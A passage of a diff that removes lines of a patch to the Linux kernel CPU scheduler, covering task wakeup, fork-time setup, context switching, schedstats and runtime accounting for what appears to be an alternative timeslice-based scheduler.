-+ * Attempt to wake up the nominated process and move it to the set of runnable
-+ * processes.
-+ *
-+ * Return: 1 if the process was woken up, 0 if it was already running.
-+ *
-+ * This function executes a full memory barrier before accessing the task state.
-+ */
-+int wake_up_process(struct task_struct *p)
-+{
-+	return try_to_wake_up(p, TASK_NORMAL, 0);
-+}
-+EXPORT_SYMBOL(wake_up_process);
-+
-+int wake_up_state(struct task_struct *p, unsigned int state)
-+{
-+	return try_to_wake_up(p, state, 0);
-+}
-+
-+/*
-+ * Perform scheduler related setup for a newly forked process p.
-+ * p is forked by current.
-+ *
-+ * __sched_fork() is basic setup used by init_idle() too:
-+ */
-+static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	p->on_rq			= 0;
-+	p->on_cpu			= 0;
-+	p->utime			= 0;
-+	p->stime			= 0;
-+	p->sched_time			= 0;
-+
-+#ifdef CONFIG_SCHEDSTATS
-+	/* Even if schedstat is disabled, there should not be garbage */
-+	memset(&p->stats, 0, sizeof(p->stats));
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+	INIT_HLIST_HEAD(&p->preempt_notifiers);
-+#endif
-+
-+#ifdef CONFIG_COMPACTION
-+	p->capture_control = NULL;
-+#endif
-+#ifdef CONFIG_SMP
-+	p->wake_entry.u_flags = CSD_TYPE_TTWU;
-+#endif
-+}
-+
-+/*
-+ * fork()/clone()-time setup:
-+ */
-+int sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	__sched_fork(clone_flags, p);
-+	/*
-+	 * We mark the process as NEW here. This guarantees that
-+	 * nobody will actually run it, and a signal or other external
-+	 * event cannot wake it up and insert it on the runqueue either.
-+	 */
-+	p->__state = TASK_NEW;
-+
-+	/*
-+	 * Make sure we do not leak PI boosting priority to the child.
-+	 */
-+	p->prio = current->normal_prio;
-+
-+	/*
-+	 * Revert to default priority/policy on fork if requested.
-+	 */
-+	if (unlikely(p->sched_reset_on_fork)) {
-+		if (task_has_rt_policy(p)) {
-+			p->policy = SCHED_NORMAL;
-+			p->static_prio = NICE_TO_PRIO(0);
-+			p->rt_priority = 0;
-+		} else if (PRIO_TO_NICE(p->static_prio) < 0)
-+			p->static_prio = NICE_TO_PRIO(0);
-+
-+		p->prio = p->normal_prio = p->static_prio;
-+
-+		/*
-+		 * We don't need the reset flag anymore after the fork. It has
-+		 * fulfilled its duty:
-+		 */
-+		p->sched_reset_on_fork = 0;
-+	}
-+
-+#ifdef CONFIG_SCHED_INFO
-+	if (unlikely(sched_info_on()))
-+		memset(&p->sched_info, 0, sizeof(p->sched_info));
-+#endif
-+	init_task_preempt_count(p);
-+
-+	return 0;
-+}
-+
-+void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	/*
-+	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
-+	 * required yet, but lockdep gets upset if rules are violated.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	/*
-+	 * Share the timeslice between parent and child, thus the
-+	 * total amount of pending timeslices in the system doesn't change,
-+	 * resulting in more scheduling fairness.
-+	 */
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->curr->time_slice /= 2;
-+	p->time_slice = rq->curr->time_slice;
-+#ifdef CONFIG_SCHED_HRTICK
-+	hrtick_start(rq, rq->curr->time_slice);
-+#endif
-+
-+	if (p->time_slice < RESCHED_NS) {
-+		p->time_slice = sched_timeslice_ns;
-+		resched_curr(rq);
-+	}
-+	sched_task_fork(p, rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rseq_migrate(p);
-+	/*
-+	 * We're setting the CPU for the first time, we don't migrate,
-+	 * so use __set_task_cpu().
-+	 */
-+	__set_task_cpu(p, smp_processor_id());
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+void sched_post_fork(struct task_struct *p)
-+{
-+}
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+DEFINE_STATIC_KEY_FALSE(sched_schedstats);
-+
-+static void set_schedstats(bool enabled)
-+{
-+	if (enabled)
-+		static_branch_enable(&sched_schedstats);
-+	else
-+		static_branch_disable(&sched_schedstats);
-+}
-+
-+void force_schedstat_enabled(void)
-+{
-+	if (!schedstat_enabled()) {
-+		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
-+		static_branch_enable(&sched_schedstats);
-+	}
-+}
-+
-+static int __init setup_schedstats(char *str)
-+{
-+	int ret = 0;
-+	if (!str)
-+		goto out;
-+
-+	if (!strcmp(str, "enable")) {
-+		set_schedstats(true);
-+		ret = 1;
-+	} else if (!strcmp(str, "disable")) {
-+		set_schedstats(false);
-+		ret = 1;
-+	}
-+out:
-+	if (!ret)
-+		pr_warn("Unable to parse schedstats=\n");
-+
-+	return ret;
-+}
-+__setup("schedstats=", setup_schedstats);
-+
-+#ifdef CONFIG_PROC_SYSCTL
-+static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
-+		size_t *lenp, loff_t *ppos)
-+{
-+	struct ctl_table t;
-+	int err;
-+	int state = static_branch_likely(&sched_schedstats);
-+
-+	if (write && !capable(CAP_SYS_ADMIN))
-+		return -EPERM;
-+
-+	t = *table;
-+	t.data = &state;
-+	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
-+	if (err < 0)
-+		return err;
-+	if (write)
-+		set_schedstats(state);
-+	return err;
-+}
-+
-+static struct ctl_table sched_core_sysctls[] = {
-+	{
-+		.procname       = "sched_schedstats",
-+		.data           = NULL,
-+		.maxlen         = sizeof(unsigned int),
-+		.mode           = 0644,
-+		.proc_handler   = sysctl_schedstats,
-+		.extra1         = SYSCTL_ZERO,
-+		.extra2         = SYSCTL_ONE,
-+	},
-+	{}
-+};
-+static int __init sched_core_sysctl_init(void)
-+{
-+	register_sysctl_init("kernel", sched_core_sysctls);
-+	return 0;
-+}
-+late_initcall(sched_core_sysctl_init);
-+#endif /* CONFIG_PROC_SYSCTL */
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+/*
-+ * wake_up_new_task - wake up a newly created task for the first time.
-+ *
-+ * This function will do some initial scheduler statistics housekeeping
-+ * that must be done for every newly created context, then puts the task
-+ * on the runqueue and wakes it.
-+ */
-+void wake_up_new_task(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	rq = cpu_rq(select_task_rq(p));
-+#ifdef CONFIG_SMP
-+	rseq_migrate(p);
-+	/*
-+	 * Fork balancing, do it here and not earlier because:
-+	 * - cpus_ptr can change in the fork path
-+	 * - any previously selected CPU might disappear through hotplug
-+	 *
-+	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
-+	 * as we're not fully set-up yet.
-+	 */
-+	__set_task_cpu(p, cpu_of(rq));
-+#endif
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	activate_task(p, rq);
-+	trace_sched_wakeup_new(p);
-+	check_preempt_curr(rq);
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+
-+static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
-+
-+void preempt_notifier_inc(void)
-+{
-+	static_branch_inc(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_inc);
-+
-+void preempt_notifier_dec(void)
-+{
-+	static_branch_dec(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_dec);
-+
-+/**
-+ * preempt_notifier_register - tell me when current is being preempted & rescheduled
-+ * @notifier: notifier struct to register
-+ */
-+void preempt_notifier_register(struct preempt_notifier *notifier)
-+{
-+	if (!static_branch_unlikely(&preempt_notifier_key))
-+		WARN(1, "registering preempt_notifier while notifiers disabled\n");
-+
-+	hlist_add_head(&notifier->link, &current->preempt_notifiers);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_register);
-+
-+/**
-+ * preempt_notifier_unregister - no longer interested in preemption notifications
-+ * @notifier: notifier struct to unregister
-+ *
-+ * This is *not* safe to call from within a preemption notifier.
-+ */
-+void preempt_notifier_unregister(struct preempt_notifier *notifier)
-+{
-+	hlist_del(&notifier->link);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
-+
-+static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_in(notifier, raw_smp_processor_id());
-+}
-+
-+static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_in_preempt_notifiers(curr);
-+}
-+
-+static void
-+__fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				   struct task_struct *next)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_out(notifier, next);
-+}
-+
-+static __always_inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_out_preempt_notifiers(curr, next);
-+}
-+
-+#else /* !CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+}
-+
-+static inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+}
-+
-+#endif /* CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void prepare_task(struct task_struct *next)
-+{
-+	/*
-+	 * Claim the task as running, we do this before switching to it
-+	 * such that any running task will have this set.
-+	 *
-+	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
-+	 * its ordering comment.
-+	 */
-+	WRITE_ONCE(next->on_cpu, 1);
-+}
-+
-+static inline void finish_task(struct task_struct *prev)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * This must be the very last reference to @prev from this CPU. After
-+	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
-+	 * must ensure this doesn't happen until the switch is completely
-+	 * finished.
-+	 *
-+	 * In particular, the load of prev->state in finish_task_switch() must
-+	 * happen before this.
-+	 *
-+	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
-+	 */
-+	smp_store_release(&prev->on_cpu, 0);
-+#else
-+	prev->on_cpu = 0;
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	void (*func)(struct rq *rq);
-+	struct balance_callback *next;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	while (head) {
-+		func = (void (*)(struct rq *))head->func;
-+		next = head->next;
-+		head->next = NULL;
-+		head = next;
-+
-+		func(rq);
-+	}
-+}
-+
-+static void balance_push(struct rq *rq);
-+
-+/*
-+ * balance_push_callback is a right abuse of the callback interface and plays
-+ * by significantly different rules.
-+ *
-+ * Where the normal balance_callback's purpose is to be ran in the same context
-+ * that queued it (only later, when it's safe to drop rq->lock again),
-+ * balance_push_callback is specifically targeted at __schedule().
-+ *
-+ * This abuse is tolerated because it places all the unlikely/odd cases behind
-+ * a single test, namely: rq->balance_callback == NULL.
-+ */
-+struct balance_callback balance_push_callback = {
-+	.next = NULL,
-+	.func = balance_push,
-+};
-+
-+static inline struct balance_callback *
-+__splice_balance_callbacks(struct rq *rq, bool split)
-+{
-+	struct balance_callback *head = rq->balance_callback;
-+
-+	if (likely(!head))
-+		return NULL;
-+
-+	lockdep_assert_rq_held(rq);
-+	/*
-+	 * Must not take balance_push_callback off the list when
-+	 * splice_balance_callbacks() and balance_callbacks() are not
-+	 * in the same rq->lock section.
-+	 *
-+	 * In that case it would be possible for __schedule() to interleave
-+	 * and observe the list empty.
-+	 */
-+	if (split && head == &balance_push_callback)
-+		head = NULL;
-+	else
-+		rq->balance_callback = NULL;
-+
-+	return head;
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return __splice_balance_callbacks(rq, true);
-+}
-+
-+static void __balance_callbacks(struct rq *rq)
-+{
-+	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	unsigned long flags;
-+
-+	if (unlikely(head)) {
-+		raw_spin_lock_irqsave(&rq->lock, flags);
-+		do_balance_callbacks(rq, head);
-+		raw_spin_unlock_irqrestore(&rq->lock, flags);
-+	}
-+}
-+
-+#else
-+
-+static inline void __balance_callbacks(struct rq *rq)
-+{
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return NULL;
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+}
-+
-+#endif
-+
-+static inline void
-+prepare_lock_switch(struct rq *rq, struct task_struct *next)
-+{
-+	/*
-+	 * Since the runqueue lock will be released by the next
-+	 * task (which is an invalid locking op but in the case
-+	 * of the scheduler it's an obvious special-case), so we
-+	 * do an early lockdep release here:
-+	 */
-+	spin_release(&rq->lock.dep_map, _THIS_IP_);
-+#ifdef CONFIG_DEBUG_SPINLOCK
-+	/* this is a valid case when another task releases the spinlock */
-+	rq->lock.owner = next;
-+#endif
-+}
-+
-+static inline void finish_lock_switch(struct rq *rq)
-+{
-+	/*
-+	 * If we are tracking spinlock dependencies then we have to
-+	 * fix up the runqueue lock - which gets 'carried over' from
-+	 * prev into current:
-+	 */
-+	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
-+	__balance_callbacks(rq);
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+/*
-+ * NOP if the arch has not defined these:
-+ */
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+static inline void kmap_local_sched_out(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_out();
-+#endif
-+}
-+
-+static inline void kmap_local_sched_in(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_in();
-+#endif
-+}
-+
-+/**
-+ * prepare_task_switch - prepare to switch tasks
-+ * @rq: the runqueue preparing to switch
-+ * @next: the task we are going to switch to.
-+ *
-+ * This is called with the rq lock held and interrupts off. It must
-+ * be paired with a subsequent finish_task_switch after the context
-+ * switch.
-+ *
-+ * prepare_task_switch sets up locking and calls architecture specific
-+ * hooks.
-+ */
-+static inline void
-+prepare_task_switch(struct rq *rq, struct task_struct *prev,
-+		    struct task_struct *next)
-+{
-+	kcov_prepare_switch(prev);
-+	sched_info_switch(rq, prev, next);
-+	perf_event_task_sched_out(prev, next);
-+	rseq_preempt(prev);
-+	fire_sched_out_preempt_notifiers(prev, next);
-+	kmap_local_sched_out();
-+	prepare_task(next);
-+	prepare_arch_switch(next);
-+}
-+
-+/**
-+ * finish_task_switch - clean up after a task-switch
-+ * @rq: runqueue associated with task-switch
-+ * @prev: the thread we just switched away from.
-+ *
-+ * finish_task_switch must be called after the context switch, paired
-+ * with a prepare_task_switch call before the context switch.
-+ * finish_task_switch will reconcile locking set up by prepare_task_switch,
-+ * and do any other architecture-specific cleanup actions.
-+ *
-+ * Note that we may have delayed dropping an mm in context_switch(). If
-+ * so, we finish that here outside of the runqueue lock.  (Doing it
-+ * with the lock held can cause deadlocks; see schedule() for
-+ * details.)
-+ *
-+ * The context switch have flipped the stack from under us and restored the
-+ * local variables which were saved when this task called schedule() in the
-+ * past. prev == current is still correct but we need to recalculate this_rq
-+ * because prev may have moved to another CPU.
-+ */
-+static struct rq *finish_task_switch(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	struct rq *rq = this_rq();
-+	struct mm_struct *mm = rq->prev_mm;
-+	unsigned int prev_state;
-+
-+	/*
-+	 * The previous task will have left us with a preempt_count of 2
-+	 * because it left us after:
-+	 *
-+	 *	schedule()
-+	 *	  preempt_disable();			// 1
-+	 *	  __schedule()
-+	 *	    raw_spin_lock_irq(&rq->lock)	// 2
-+	 *
-+	 * Also, see FORK_PREEMPT_COUNT.
-+	 */
-+	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
-+		      "corrupted preempt_count: %s/%d/0x%x\n",
-+		      current->comm, current->pid, preempt_count()))
-+		preempt_count_set(FORK_PREEMPT_COUNT);
-+
-+	rq->prev_mm = NULL;
-+
-+	/*
-+	 * A task struct has one reference for the use as "current".
-+	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
-+	 * schedule one last time. The schedule call will never return, and
-+	 * the scheduled task must drop that reference.
-+	 *
-+	 * We must observe prev->state before clearing prev->on_cpu (in
-+	 * finish_task), otherwise a concurrent wakeup can get prev
-+	 * running on another CPU and we could rave with its RUNNING -> DEAD
-+	 * transition, resulting in a double drop.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	vtime_task_switch(prev);
-+	perf_event_task_sched_in(prev, current);
-+	finish_task(prev);
-+	tick_nohz_task_switch();
-+	finish_lock_switch(rq);
-+	finish_arch_post_lock_switch();
-+	kcov_finish_switch(current);
-+	/*
-+	 * kmap_local_sched_out() is invoked with rq::lock held and
-+	 * interrupts disabled. There is no requirement for that, but the
-+	 * sched out code does not have an interrupt enabled section.
-+	 * Restoring the maps on sched in does not require interrupts being
-+	 * disabled either.
-+	 */
-+	kmap_local_sched_in();
-+
-+	fire_sched_in_preempt_notifiers(current);
-+	/*
-+	 * When switching through a kernel thread, the loop in
-+	 * membarrier_{private,global}_expedited() may have observed that
-+	 * kernel thread and not issued an IPI. It is therefore possible to
-+	 * schedule between user->kernel->user threads without passing though
-+	 * switch_mm(). Membarrier requires a barrier after storing to
-+	 * rq->curr, before returning to userspace, so provide them here:
-+	 *
-+	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
-+	 *   provided by mmdrop(),
-+	 * - a sync_core for SYNC_CORE.
-+	 */
-+	if (mm) {
-+		membarrier_mm_sync_core_before_usermode(mm);
-+		mmdrop_sched(mm);
-+	}
-+	if (unlikely(prev_state == TASK_DEAD)) {
-+		/* Task is done with its stack. */
-+		put_task_stack(prev);
-+
-+		put_task_struct_rcu_user(prev);
-+	}
-+
-+	return rq;
-+}
-+
-+/**
-+ * schedule_tail - first thing a freshly forked thread must call.
-+ * @prev: the thread we just switched away from.
-+ */
-+asmlinkage __visible void schedule_tail(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	/*
-+	 * New tasks start with FORK_PREEMPT_COUNT, see there and
-+	 * finish_task_switch() for details.
-+	 *
-+	 * finish_task_switch() will drop rq->lock() and lower preempt_count
-+	 * and the preempt_enable() will end up enabling preemption (on
-+	 * PREEMPT_COUNT kernels).
-+	 */
-+
-+	finish_task_switch(prev);
-+	preempt_enable();
-+
-+	if (current->set_child_tid)
-+		put_user(task_pid_vnr(current), current->set_child_tid);
-+
-+	calculate_sigpending();
-+}
-+
-+/*
-+ * context_switch - switch to the new MM and the new thread's register state.
-+ */
-+static __always_inline struct rq *
-+context_switch(struct rq *rq, struct task_struct *prev,
-+	       struct task_struct *next)
-+{
-+	prepare_task_switch(rq, prev, next);
-+
-+	/*
-+	 * For paravirt, this is coupled with an exit in switch_to to
-+	 * combine the page table reload and the switch backend into
-+	 * one hypercall.
-+	 */
-+	arch_start_context_switch(prev);
-+
-+	/*
-+	 * kernel -> kernel   lazy + transfer active
-+	 *   user -> kernel   lazy + mmgrab() active
-+	 *
-+	 * kernel ->   user   switch + mmdrop() active
-+	 *   user ->   user   switch
-+	 */
-+	if (!next->mm) {                                // to kernel
-+		enter_lazy_tlb(prev->active_mm, next);
-+
-+		next->active_mm = prev->active_mm;
-+		if (prev->mm)                           // from user
-+			mmgrab(prev->active_mm);
-+		else
-+			prev->active_mm = NULL;
-+	} else {                                        // to user
-+		membarrier_switch_mm(rq, prev->active_mm, next->mm);
-+		/*
-+		 * sys_membarrier() requires an smp_mb() between setting
-+		 * rq->curr / membarrier_switch_mm() and returning to userspace.
-+		 *
-+		 * The below provides this either through switch_mm(), or in
-+		 * case 'prev->active_mm == next->mm' through
-+		 * finish_task_switch()'s mmdrop().
-+		 */
-+		switch_mm_irqs_off(prev->active_mm, next->mm, next);
-+		lru_gen_use_mm(next->mm);
-+
-+		if (!prev->mm) {                        // from kernel
-+			/* will mmdrop() in finish_task_switch(). */
-+			rq->prev_mm = prev->active_mm;
-+			prev->active_mm = NULL;
-+		}
-+	}
-+
-+	prepare_lock_switch(rq, next);
-+
-+	/* Here we just switch the register state and the stack. */
-+	switch_to(prev, next, prev);
-+	barrier();
-+
-+	return finish_task_switch(prev);
-+}
-+
-+/*
-+ * nr_running, nr_uninterruptible and nr_context_switches:
-+ *
-+ * externally visible scheduler statistics: current number of runnable
-+ * threads, total number of context switches performed since bootup.
-+ */
-+unsigned int nr_running(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_online_cpu(i)
-+		sum += cpu_rq(i)->nr_running;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Check if only the current task is running on the CPU.
-+ *
-+ * Caution: this function does not check that the caller has disabled
-+ * preemption, thus the result might have a time-of-check-to-time-of-use
-+ * race.  The caller is responsible to use it correctly, for example:
-+ *
-+ * - from a non-preemptible section (of course)
-+ *
-+ * - from a thread that is bound to a single CPU
-+ *
-+ * - in a loop with very short iterations (e.g. a polling loop)
-+ */
-+bool single_task_running(void)
-+{
-+	return raw_rq()->nr_running == 1;
-+}
-+EXPORT_SYMBOL(single_task_running);
-+
-+unsigned long long nr_context_switches(void)
-+{
-+	int i;
-+	unsigned long long sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += cpu_rq(i)->nr_switches;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Consumers of these two interfaces, like for example the cpuidle menu
-+ * governor, are using nonsensical data. Preferring shallow idle state selection
-+ * for a CPU that has IO-wait which might not even end up running the task when
-+ * it does become runnable.
-+ */
-+
-+unsigned int nr_iowait_cpu(int cpu)
-+{
-+	return atomic_read(&cpu_rq(cpu)->nr_iowait);
-+}
-+
-+/*
-+ * IO-wait accounting, and how it's mostly bollocks (on SMP).
-+ *
-+ * The idea behind IO-wait account is to account the idle time that we could
-+ * have spend running if it were not for IO. That is, if we were to improve the
-+ * storage performance, we'd have a proportional reduction in IO-wait time.
-+ *
-+ * This all works nicely on UP, where, when a task blocks on IO, we account
-+ * idle time as IO-wait, because if the storage were faster, it could've been
-+ * running and we'd not be idle.
-+ *
-+ * This has been extended to SMP, by doing the same for each CPU. This however
-+ * is broken.
-+ *
-+ * Imagine for instance the case where two tasks block on one CPU, only the one
-+ * CPU will have IO-wait accounted, while the other has regular idle. Even
-+ * though, if the storage were faster, both could've ran at the same time,
-+ * utilising both CPUs.
-+ *
-+ * This means, that when looking globally, the current IO-wait accounting on
-+ * SMP is a lower bound, by reason of under accounting.
-+ *
-+ * Worse, since the numbers are provided per CPU, they are sometimes
-+ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
-+ * associated with any one particular CPU, it can wake to another CPU than it
-+ * blocked on. This means the per CPU IO-wait number is meaningless.
-+ *
-+ * Task CPU affinities can make all that even more 'interesting'.
-+ */
-+
-+unsigned int nr_iowait(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += nr_iowait_cpu(i);
-+
-+	return sum;
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+/*
-+ * sched_exec - execve() is a valuable balancing opportunity, because at
-+ * this point the task has the smallest effective memory and cache
-+ * footprint.
-+ */
-+void sched_exec(void)
-+{
-+}
-+
-+#endif
-+
-+DEFINE_PER_CPU(struct kernel_stat, kstat);
-+DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
-+
-+EXPORT_PER_CPU_SYMBOL(kstat);
-+EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
-+
-+static inline void update_curr(struct rq *rq, struct task_struct *p)
-+{
-+	s64 ns = rq->clock_task - p->last_ran;
-+
-+	p->sched_time += ns;
-+	cgroup_account_cputime(p, ns);
-+	account_group_exec_runtime(p, ns);
-+
-+	p->time_slice -= ns;
-+	p->last_ran = rq->clock_task;
-+}
-+
-+/*
-+ * Return accounted runtime for the task.
-+ * Return separately the current's pending runtime that have not been
-+ * accounted yet.
-+ */
-+unsigned long long task_sched_runtime(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	u64 ns;
-+
-+#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
-+	/*
-+	 * 64-bit doesn't need locks to atomically read a 64-bit value.
-+	 * So we have a optimization chance when the task's delta_exec is 0.
-+	 * Reading ->on_cpu is racy, but this is ok.
-+	 *
-+	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
-+	 * If we race with it entering CPU, unaccounted time is 0. This is
-+	 * indistinguishable from the read occurring a few cycles earlier.
-+	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
-+	 * been accounted, so we're correct here as well.
-+	 */
-+	if (!p->on_cpu || !task_on_rq_queued(p))
-+		return tsk_seruntime(p);
-+#endif
-+
-+	rq = task_access_lock_irqsave(p, &lock, &flags);
-+	/*
-+	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
-+	 * project cycles that may never be accounted to this
-+	 * thread, breaking clock_gettime().
-+	 */
-+	if (p == rq->curr && task_on_rq_queued(p)) {
-+		update_rq_clock(rq);
-+		update_curr(rq, p);
-+	}
-+	ns = tsk_seruntime(p);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+	return ns;
-+}
-+
-+/* This manages tasks that have run out of timeslice during a scheduler_tick */
-+static inline void scheduler_task_tick(struct rq *rq)
-+{
-+	struct task_struct *p = rq->curr;
-+
-+	if (is_idle_task(p))
-+		return;
-+
-+	update_curr(rq, p);
-+	cpufreq_update_util(rq, 0);
-+
-+	/*
-+	 * Tasks have less than RESCHED_NS of time slice left they will be
-+	 * rescheduled.
-+	 */
-+	if (p->time_slice >= RESCHED_NS)
-+		return;
-+	set_tsk_need_resched(p);
-+	set_preempt_need_resched();
-+}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+static u64 cpu_resched_latency(struct rq *rq)
-+{
-+	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
-+	u64 resched_latency, now = rq_clock(rq);
-+	static bool warned_once;
-+
-+	if (sysctl_resched_latency_warn_once && warned_once)
-+		return 0;
-+
-+	if (!need_resched() || !latency_warn_ms)
-+		return 0;
-+
-+	if (system_state == SYSTEM_BOOTING)
-+		return 0;
-+
-+	if (!rq->last_seen_need_resched_ns) {
-+		rq->last_seen_need_resched_ns = now;
-+		rq->ticks_without_resched = 0;
-+		return 0;
-+	}
-+
-+	rq->ticks_without_resched++;
-+	resched_latency = now - rq->last_seen_need_resched_ns;
-+	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
-+		return 0;
-+
-+	warned_once = true;
-+
-+	return resched_latency;
-+}
-+
-+static int __init setup_resched_latency_warn_ms(char *str)
-+{
-+	long val;
-+
-+	if ((kstrtol(str, 0, &val))) {
-+		pr_warn("Unable to set resched_latency_warn_ms\n");
-+		return 1;
-+	}
-+
-+	sysctl_resched_latency_warn_ms = val;
-+	return 1;
-+}
-+__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
-+#else
-+static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+/*
-+ * This function gets called by the timer code, with HZ frequency.
-+ * We call it with interrupts disabled.
-+ */
-+void scheduler_tick(void)
-+{
-+	int cpu __maybe_unused = smp_processor_id();
-+	struct rq *rq = cpu_rq(cpu);
-+	u64 resched_latency;
-+
-+	arch_scale_freq_tick();
-+	sched_clock_tick();
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	scheduler_task_tick(rq);
-+	if (sched_feat(LATENCY_WARN))
-+		resched_latency = cpu_resched_latency(rq);
-+	calc_global_load_tick(rq);
-+
-+	rq->last_tick = rq->clock;
-+	raw_spin_unlock(&rq->lock);
-+
-+	if (sched_feat(LATENCY_WARN) && resched_latency)
-+		resched_latency_warn(cpu, resched_latency);
-+
-+	perf_event_task_tick();
-+}
-+
-+#ifdef CONFIG_SCHED_SMT
-+static inline int sg_balance_cpu_stop(void *data)
-+{
-+	struct rq *rq = this_rq();
-+	struct task_struct *p = data;
-+	cpumask_t tmp;
-+	unsigned long flags;
-+
-+	local_irq_save(flags);
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->active_balance = 0;
-+	/* _something_ may have changed the task, double check again */
-+	if (task_on_rq_queued(p) && task_rq(p) == rq &&
-+	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
-+	    !is_migration_disabled(p)) {
-+		int cpu = cpu_of(rq);
-+		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
-+		rq = move_queued_task(rq, p, dcpu);
-+	}
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock(&p->pi_lock);
-+
-+	local_irq_restore(flags);
-+
